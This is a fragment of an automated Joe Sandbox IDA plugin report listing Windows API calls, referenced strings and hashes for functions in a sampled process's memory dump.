                                                    • Instruction Fuzzy Hash: 9C919E712047119BCB04EF20C851A7AB7E1BF94354F108859F99A6B3A2DF35FD49EB82
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00F5E31F
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F5E32F
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F5E33B
                                                    • __wsplitpath.LIBCMT ref: 00F5E399
                                                    • _wcscat.LIBCMT ref: 00F5E3B1
                                                    • _wcscat.LIBCMT ref: 00F5E3C3
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F5E3D8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E3EC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E41E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E43F
                                                    • _wcscpy.LIBCMT ref: 00F5E44B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F5E48A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: bb3a356f84b960eabdce464f0d421a134f905ac78cc0a8c57953c2d04d818202
                                                    • Instruction ID: 20ba98230dfc227a17e606d602554e4f66240c2201ae5079005e01ea5e7b5f79
                                                    • Opcode Fuzzy Hash: bb3a356f84b960eabdce464f0d421a134f905ac78cc0a8c57953c2d04d818202
                                                    • Instruction Fuzzy Hash: 69616B765043059FC714EF60C844AAFB3E8FF89320F04891EFA8997251DB35EA49DB92
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F5A2C2
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F5A2E3
                                                    • __swprintf.LIBCMT ref: 00F5A33C
                                                    • __swprintf.LIBCMT ref: 00F5A355
                                                    • _wprintf.LIBCMT ref: 00F5A3FC
                                                    • _wprintf.LIBCMT ref: 00F5A41A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-3080491070
                                                    • Opcode ID: 279b85f47bacdc1876510d6804709c7896cf7367212a8a69dd3035edc2a7bcad
                                                    • Instruction ID: 0d556dc0306b0a4415e6975d211c89b3e98ce1746006b23f60048e05f844e248
                                                    • Opcode Fuzzy Hash: 279b85f47bacdc1876510d6804709c7896cf7367212a8a69dd3035edc2a7bcad
                                                    • Instruction Fuzzy Hash: BD518F72900219AADF15EBE0CD86EEEB779BF04341F104255F505B20A2EB396F58FB61
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F63FF9,00000000), ref: 00F5009A
                                                    • LoadStringW.USER32(00000000,?,00F3F8B8,00000001), ref: 00F500A3
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • GetModuleHandleW.KERNEL32(00000000,00FB7310,?,00000FFF,?,?,00F3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F63FF9,00000000,00000001), ref: 00F500C5
                                                    • LoadStringW.USER32(00000000,?,00F3F8B8,00000001), ref: 00F500C8
                                                    • __swprintf.LIBCMT ref: 00F50118
                                                    • __swprintf.LIBCMT ref: 00F50129
                                                    • _wprintf.LIBCMT ref: 00F501D2
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F501E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: d763d5a3a53adca987ff26efc771d007063779cd483abf8e340badc95e628af1
                                                    • Instruction ID: 2f37241059fed2c92ea1492e32684e62260ab7cb9cee04c83a2f6c2f3ad3e561
                                                    • Opcode Fuzzy Hash: d763d5a3a53adca987ff26efc771d007063779cd483abf8e340badc95e628af1
                                                    • Instruction Fuzzy Hash: 67416C72800119AACB15EBE0CD96EEEB778BF14341F500165F601B2092EF38AF49FB61
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F5AA0E
                                                    • GetDriveTypeW.KERNEL32 ref: 00F5AA5B
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AAA3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AADA
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AB08
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: de9ec0d4fc90db615bee0bb5910fbe5e7080f98024c7ef0a2bc9cfd4a962c165
                                                    • Instruction ID: 9c7232733bb2694133e39570cb30069767609cc622c809c2176ba779834cd0b4
                                                    • Opcode Fuzzy Hash: de9ec0d4fc90db615bee0bb5910fbe5e7080f98024c7ef0a2bc9cfd4a962c165
                                                    • Instruction Fuzzy Hash: 31516DB1504305AFC700EF10C88196AB7F4FF98758F10895DF895572A2DB35EE09EB92
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F5A852
                                                    • __swprintf.LIBCMT ref: 00F5A874
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F5A8B1
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F5A8D6
                                                    • _memset.LIBCMT ref: 00F5A8F5
                                                    • _wcsncpy.LIBCMT ref: 00F5A931
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F5A966
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F5A971
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F5A97A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F5A984
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: cb7303b3eedac31089dfd3dba58c70fe9bc5dd78bc9726cc989f9b5ad98fa84a
                                                    • Instruction ID: 4a41a61eae46623906beba6a3b5416527c0563ef89787bce7db8bc53157176a8
                                                    • Opcode Fuzzy Hash: cb7303b3eedac31089dfd3dba58c70fe9bc5dd78bc9726cc989f9b5ad98fa84a
                                                    • Instruction Fuzzy Hash: C531D87190011AABDB20DFA0DC48FFB737CEF89711F5041B5FA08D2150EB7496999B25
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F7982C,?,?), ref: 00F7C0C8
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0DF
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0EA
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0F7
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F7C100
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C10F
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F7C118
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C11F
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C130
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F83C7C,?), ref: 00F7C149
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F7C159
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00F7C17D
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F7C1A8
                                                    • DeleteObject.GDI32(00000000), ref: 00F7C1D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F7C1E6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: b40346ed1d30c8f73362cf9fd62993d59e5524c718ce0145ef89e1954e82d03f
                                                    • Instruction ID: 741e27b415bea882c722aa9e036d178b5d105ad3cd785055a250629dbdf39ab9
                                                    • Opcode Fuzzy Hash: b40346ed1d30c8f73362cf9fd62993d59e5524c718ce0145ef89e1954e82d03f
                                                    • Instruction Fuzzy Hash: 38415C71500208EFCB619F64CC4CEAA7BB8EF89721F508069F909D7261DB709944EBA1
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F7C8A4
                                                    • GetFocus.USER32 ref: 00F7C8B4
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00F7C8BF
                                                    • _memset.LIBCMT ref: 00F7C9EA
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F7CA15
                                                    • GetMenuItemCount.USER32(?), ref: 00F7CA35
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F7CA48
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F7CA7C
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F7CAC4
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F7CAFC
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F7CB31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: 9a8317501e2d7029ab382909de3863ee390637de0ba9e5392760f5d9258fa46c
                                                    • Instruction ID: 25395b3a58f4786c2cf1978209d6d5afb80c8990fce1900828c3e68351caae5d
                                                    • Opcode Fuzzy Hash: 9a8317501e2d7029ab382909de3863ee390637de0ba9e5392760f5d9258fa46c
                                                    • Instruction Fuzzy Hash: 86819D716083059FD710DF14C895EABBBE8FF88364F00852EF99997291D730D905EBA2
                                                    APIs
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                      • Part of subcall function 00F48E20: GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                      • Part of subcall function 00F48E20: GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                      • Part of subcall function 00F48E20: HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                      • Part of subcall function 00F48EBD: GetProcessHeap.KERNEL32(00000008,00F48916,00000000,00000000,?,00F48916,?), ref: 00F48EC9
                                                      • Part of subcall function 00F48EBD: HeapAlloc.KERNEL32(00000000,?,00F48916,?), ref: 00F48ED0
                                                      • Part of subcall function 00F48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F48916,?), ref: 00F48EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F48B2E
                                                    • _memset.LIBCMT ref: 00F48B43
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F48B62
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48B73
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F48BB0
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F48BCC
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48BE9
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F48BF8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F48BFF
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F48C20
                                                    • CopySid.ADVAPI32(00000000), ref: 00F48C27
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F48C58
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F48C7E
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F48C92
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: d0e4713829a24b5db097c955c4f5a4f7f5b9b8395c72b1602a6bf632df1eb4e7
                                                    • Instruction ID: b7c2d97374490e8663db6c8c536e48f193646c79fa4b13bdaa4fb0f16288ae3f
                                                    • Opcode Fuzzy Hash: d0e4713829a24b5db097c955c4f5a4f7f5b9b8395c72b1602a6bf632df1eb4e7
                                                    • Instruction Fuzzy Hash: E6614771D00209EFDF10DFA4DC85EEEBBB9FF04350F048169EA15A6290DB359A06EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F67A79
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F67A85
                                                    • CreateCompatibleDC.GDI32(?), ref: 00F67A91
                                                    • SelectObject.GDI32(00000000,?), ref: 00F67A9E
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F67AF2
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F67B2E
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F67B52
                                                    • SelectObject.GDI32(00000006,?), ref: 00F67B5A
                                                    • DeleteObject.GDI32(?), ref: 00F67B63
                                                    • DeleteDC.GDI32(00000006), ref: 00F67B6A
                                                    • ReleaseDC.USER32(00000000,?), ref: 00F67B75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 8ed215eae5fd62cc7d3746811de0626d62c6b6c6d070ee87cdabc04bb5b7eefb
                                                    • Instruction ID: c66265922589084c4f6f380393a65e8e7301bbfa8f156246b8a72fd369d2d423
                                                    • Opcode Fuzzy Hash: 8ed215eae5fd62cc7d3746811de0626d62c6b6c6d070ee87cdabc04bb5b7eefb
                                                    • Instruction Fuzzy Hash: 2B515872904309EFCB14DFA8CC85EAEBBB9EF48310F14851DF94AA7260D735A945DB60
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F5A4D4
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F5A4F6
                                                    • __swprintf.LIBCMT ref: 00F5A54F
                                                    • __swprintf.LIBCMT ref: 00F5A568
                                                    • _wprintf.LIBCMT ref: 00F5A61E
                                                    • _wprintf.LIBCMT ref: 00F5A63C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-2391861430
                                                    • Opcode ID: e297a06e6a9e5f2d08ace01ef6995506be8f0253ca0a60696bc8e3b7b7ce9970
                                                    • Instruction ID: c3925fd99bb73337e756de7d2018cfcd0705a4e72a664b1c5a9bfe3174da57a3
                                                    • Opcode Fuzzy Hash: e297a06e6a9e5f2d08ace01ef6995506be8f0253ca0a60696bc8e3b7b7ce9970
                                                    • Instruction Fuzzy Hash: E9517E71900119AACF15EBA0CD86EEEB779BF04341F104265F905620A2EB396F58FF61
                                                    APIs
                                                      • Part of subcall function 00F5951A: __time64.LIBCMT ref: 00F59524
                                                      • Part of subcall function 00F04A8C: _fseek.LIBCMT ref: 00F04AA4
                                                    • __wsplitpath.LIBCMT ref: 00F597EF
                                                      • Part of subcall function 00F1431E: __wsplitpath_helper.LIBCMT ref: 00F1435E
                                                    • _wcscpy.LIBCMT ref: 00F59802
                                                    • _wcscat.LIBCMT ref: 00F59815
                                                    • __wsplitpath.LIBCMT ref: 00F5983A
                                                    • _wcscat.LIBCMT ref: 00F59850
                                                    • _wcscat.LIBCMT ref: 00F59863
                                                      • Part of subcall function 00F59560: _memmove.LIBCMT ref: 00F59599
                                                      • Part of subcall function 00F59560: _memmove.LIBCMT ref: 00F595A8
                                                    • _wcscmp.LIBCMT ref: 00F597AA
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DE1
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DF4
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F59A0D
                                                    • _wcsncpy.LIBCMT ref: 00F59A80
                                                    • DeleteFileW.KERNEL32(?,?), ref: 00F59AB6
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F59ACC
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F59ADD
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F59AEF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: f7ade25410f76b8ddf4ba18aeb4fc2dccdab7f3b651db5ed1ec0cd3e784399be
                                                    • Instruction ID: 6c2378529cafe7c3f573e1e05554064e3c30ad5fd7e5dd906d400687e15c1794
                                                    • Opcode Fuzzy Hash: f7ade25410f76b8ddf4ba18aeb4fc2dccdab7f3b651db5ed1ec0cd3e784399be
                                                    • Instruction Fuzzy Hash: FCC15FB1D00219AACF15DF94CC85EDEB7BDEF44310F0040AAFA09E7151EB749A88AF65
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05BF1
                                                    • GetMenuItemCount.USER32(00FB7890), ref: 00F40E7B
                                                    • GetMenuItemCount.USER32(00FB7890), ref: 00F40F2B
                                                    • GetCursorPos.USER32(?), ref: 00F40F6F
                                                    • SetForegroundWindow.USER32(00000000), ref: 00F40F78
                                                    • TrackPopupMenuEx.USER32(00FB7890,00000000,?,00000000,00000000,00000000), ref: 00F40F8B
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F40F97
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 2751501086-0
